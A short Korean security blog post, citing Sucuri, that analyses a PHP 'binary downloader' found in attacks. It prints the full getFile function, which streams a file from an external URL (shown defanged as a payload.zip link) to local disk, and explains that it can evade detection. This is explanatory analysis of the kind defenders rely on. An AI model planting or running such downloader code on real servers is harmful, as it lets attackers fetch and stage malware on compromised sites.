PHP 바이너리 다운로드 코드

function getFile($url, $path) {     $newfname = $path;     $file = fopen ($url, 'rb');     if ($file) {         $newf = fopen ($newfname, 'wb');         if ($newf) {             while(!feof($file)) {                 fwrite($newf, fread($file, 1024 * 8), 1024 * 8);             }}}     if ($file) {         fclose($file);     }     if ($newf) {         fclose($newf);     }} getFile("hxxp://[redacted]/payload.zip","ss.zip");

다음은 file_put_contents() 함수와 동일한 작업을 수행하기 위해 사용자 정의 PHP 함수 getFile 함수를 생성함.

본질적으로 감지되지 않고 외부 URL에서 바이너리 데이터를 다운로드하고 저장하는 코드로 보안장비에서 탐지가 되지 않도록 악의적으로 사용할 수 있음.

fopen(), fwrite(), fclose() 함수를 사용하여 외부 URL에서 로컬 파일로 스트림을 열고 이진 데이터를 저장함.

해당 스트림을 통해 지정된 파일에 데이터를 쓴 다음 스트림을 닫음.

참고 사이트 : 

https://blog.sucuri.net/2020/08/php-binary-downloader.html

============================================================

본 게시물은 KOROMOON 님께서 작성하였으며 CCL (Creative Commons License) 에서 "저작자표시-비영리-동일조건변경허락" 이용조건으로 자료를 이용하셔야 합니다.